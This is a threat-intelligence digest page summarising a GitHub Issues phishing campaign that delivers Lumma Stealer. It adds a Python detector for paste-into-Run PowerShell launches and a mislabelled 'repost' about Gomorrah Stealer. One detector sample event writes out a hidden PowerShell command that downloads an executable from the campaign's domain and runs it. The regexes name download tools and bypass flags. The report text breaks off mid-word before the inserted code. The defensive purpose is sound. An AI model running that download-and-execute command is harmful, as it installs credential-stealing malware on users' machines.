One Article Review

The article:
Source RiskIQ
Identifier 8580658
Publication date 2024-09-20 16:51:05 (viewed: 2024-09-20 17:18:22)
Title Clever 'GitHub Scanner' campaign abusing repos to push malware (Recycled)
Text
## Snapshot
Bleeping Computer reports a new phishing campaign that abuses GitHub repositories to distribute the [Lumma Stealer](https://security.microsoft.com/intel-profiles/33933578825488511c30b0728dd3c4f8b5ca20e41c285a56f796eb39f57531ad) malware, targeting users through the platform's "Issues" feature.
## Description
Malicious GitHub users file false "security vulnerability" reports on open-source projects to lure users into visiting a counterfeit "GitHub Scanner" website. The email alerts are sent from legitimate GitHub servers, originate from the legitimate GitHub email address, notifications@github.com, and are signed "Best regards, Github Security Team" in the message body, in an attempt to make the messages appear more authentic. In the email, users are asked to contact "github-scanner[.]com," which is not affiliated with GitHub, to learn more about the alleged security issue. When users visit the fraudulent domain, they are prompted with a fake captcha, which copies malicious JavaScript code to their clipboard. A subsequent screen instructs them to execute the Windows Run command and paste the copied code. This triggers a PowerShell script that downloads the file 'l6E.exe' from the malicious domain, which is equipped with anti-detection and persistence capabilities. The file is saved as "SysSetup.exe" in a temporary directory and, when executed, installs the Lumma Stealer malware. Lumma Stealer is designed to steal credentials, cookies, browsing history, and cryptocurrency wallets from the infected device. Bleeping Computer previously [reported](https://www.bleepingcomputer.com/news/security/github-comments-abused-to-push-password-stealing-malware-masked-as-fixes/) that Lumma Stealer has been linked to similar attacks aiming to steal developers' credentials and compromise source code for potential supply chain attacks.
## Recommendations
Apply these mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.
- Check your Office 365 email filtering settings to ensure you block spoofed emails, spam, and emails with malware. Use [Microsoft Defender for Office 365](https://learn.microsoft.com/microsoft-365/security/office-365-security/defender-for-office-365?ocid=magicti_ta_learndoc) for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Microsoft Defender for Office 365 to [recheck links on click](https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-links-about?ocid=magicti_ta_learndoc) and [delete sent mail](https://learn.microsoft.com/microsoft-365/security/office-365-security/zero-hour-auto-purge?ocid=magicti_ta_learndoc) in response to newly acquired threat intelligence. Organizations can also leverage web browsers that automatically [identify and block malicious websites](https://learn.microsoft.com/deployedge/microsoft-edge-security-smartscreen?ocid=magicti_ta_learndoc), including those used in this phishing campaign. To build resilience against phishing attacks in general, organizations can use [anti-phishing policies](https://docs.microsoft.com/microsoft-365/security/office-365-security/set-up-anti-phishing-policies?view=o365-worldwide) to enable mailbox intelligence settings, as well as configure impersonation protection settings for specific messages and sender domains. Enabling [SafeLinks](https://docs.microsoft.com/microsoft-365/security/office-365-security/safe-links?view=o365-worldwide) ensures real-time protection by scanning at time of delivery and at time of click.
- Encourage users to use Microsoft Edge and other web browsers that support [SmartScreen](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/web-protection-overview?ocid=magicti_ta_learndoc), which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-firs
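Detection logic for the paste-into-Run step of the chain described above, as an added example that is not part of the original report: the tell-tale is a PowerShell process whose parent is explorer.exe (how the Win+R Run dialog launches programs) and whose command line downloads a file into the temp directory and runs it. The event records, their field names, and the command lines are constructed samples, not real telemetry; `github-scanner[.]com`, `l6E.exe` and `SysSetup.exe` are the names the report gives.

```python
"""Detection logic for the paste-into-Run step described above: PowerShell spawned
by explorer.exe whose command line downloads a file into the temp directory and
runs it. Events below are constructed samples, not real telemetry."""
import re
import ntpath

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
# Constructed sample process-creation events (parent, image, command line).
SAMPLE_EVENTS = [
    {"id": 1, "parent": EXPLORER, "image": PS,   # the campaign's paste-into-Run step
     "cmdline": r"powershell -w hidden -c iwr hxxp://github-scanner[.]com/l6E.exe "
                r"-OutFile $env:TEMP\SysSetup.exe; & $env:TEMP\SysSetup.exe"},
    {"id": 2, "parent": EXPLORER, "image": PS,   # user just opened a console
     "cmdline": r"powershell"},
    {"id": 3, "parent": r"C:\Program Files\Vendor\updater.exe", "image": PS,
     "cmdline": r"powershell -c Invoke-WebRequest https://updates.example.com/pkg.msi "
                r"-OutFile $env:TEMP\pkg.msi"},   # scripted updater, not from Run
]

RUN_DIALOG_PARENT = {"explorer.exe"}      # Win+R Run dialog launches via explorer.exe
SHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
DOWNLOAD = re.compile(r"\b(iwr|invoke-webrequest|downloadfile|downloadstring|curl|wget)\b", re.I)
TEMP_DIR = re.compile(r"\$env:temp|%temp%|\\temp\\", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|-enc\b", re.I)
RUN_DROPPED = re.compile(r"(&|start(-process)?|\.\\)\s*\S*\.exe", re.I)

def score_event(ev):
    """Return (score, reasons): one point per indicator present in the event."""
    reasons, cmd = [], ev["cmdline"]
    if (ntpath.basename(ev["parent"]).lower() in RUN_DIALOG_PARENT
            and ntpath.basename(ev["image"]).lower() in SHELL_IMAGES):
        reasons.append("shell spawned by explorer.exe (Run dialog / paste-and-run)")
    if DOWNLOAD.search(cmd):
        reasons.append("command line downloads content")
    if TEMP_DIR.search(cmd):
        reasons.append("writes to the temp directory")
    if HIDDEN.search(cmd):
        reasons.append("hidden window / policy-bypass flags")
    if RUN_DROPPED.search(cmd):
        reasons.append("executes a dropped .exe")
    return len(reasons), reasons

def detect(events, threshold=3):
    """Return ids of events matching at least `threshold` indicators."""
    return [ev["id"] for ev in events if score_event(ev)[0] >= threshold]

if __name__ == "__main__":
    print("flagged event ids:", detect(SAMPLE_EVENTS))   # -> [1]
```

Only the first event reaches the threshold; a user merely opening a console from Run (event 2) or a scripted updater downloading to temp from a non-explorer parent (event 3) each score too low, which is the point of combining the parent-process check with the command-line indicators rather than alerting on any one of them.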
Tags Ransomware Spam Malware Tool Threat


Reposts of the article (1):
Source RiskIQ
Identifier 8579832
Publication date 2024-09-19 20:13:20 (viewed: 2024-09-19 20:18:14)
Title Gomorrah Stealer v5.1: An In-Depth Analysis of a .NET-Based Malware
Text
## Snapshot
Cyfirma has published a report on Gomorrah Stealer, a .NET-based information stealer that operates under a malware-as-a-service (MaaS) model.
## Description
This sophisticated malware targets a wide array of sensitive data, including passwords, credit card details, web browser cookies, VPNs, cryptocurrency wallets, messaging applications, and FTP clients. It employs evasion techniques such as debugger and virtual-environment detection, modifies the Windows registry for persistence, and uses pure .NET intermediate language (IL) code with just-in-time (JIT) compilation to resist static analysis. Gomorrah Stealer infiltrates systems by dropping a DLL file, relocating its executables, and creating directories in the temp folder to organize harvested data. It captures system information, installed programs, and running processes, and takes screenshots. After exfiltrating the data to a command-and-control (C2) server, it deletes the local files to cover its tracks. The malware is distributed via a Telegram channel backed by a threat actor named 'lucifer', who also promotes it on social media platforms such as YouTube and Facebook.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.
- Check your Office 365 email filtering settings to ensure you block spoofed emails, spam, and emails with malware. Use [Microsoft Defender for Office 365](https://learn.microsoft.com/microsoft-365/security/office-365-security/defender-for-office-365?ocid=magicti_ta_learndoc) for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Microsoft Defender for Office 365 to [recheck links on click](https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-links-about?ocid=magicti_ta_learndoc) and [delete sent mail](https://learn.microsoft.com/microsoft-365/security/office-365-security/zero-hour-auto-purge?ocid=magicti_ta_learndoc) in response to newly acquired threat intelligence. Turn on [Safe Attachments policies](https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-attachments-policies-configure?ocid=magicti_ta_learndoc) to check attachments on inbound email.
- Encourage users to use Microsoft Edge and other web browsers that support [SmartScreen](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/web-protection-overview?ocid=magicti_ta_learndoc), which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
- Enforce MFA on all accounts, remove users excluded from MFA, and strictly [require MFA](https://learn.microsoft.com/azure/active-directory/identity-protection/howto-identity-protection-configure-mfa-policy?ocid=magicti_ta_learndoc) from all devices, in all locations, at all times.
- Enable passwordless authentication methods (for example, Windows He
Tags Ransomware Spam Malware Tool Threat


The article does not appear to be a repost of an earlier one.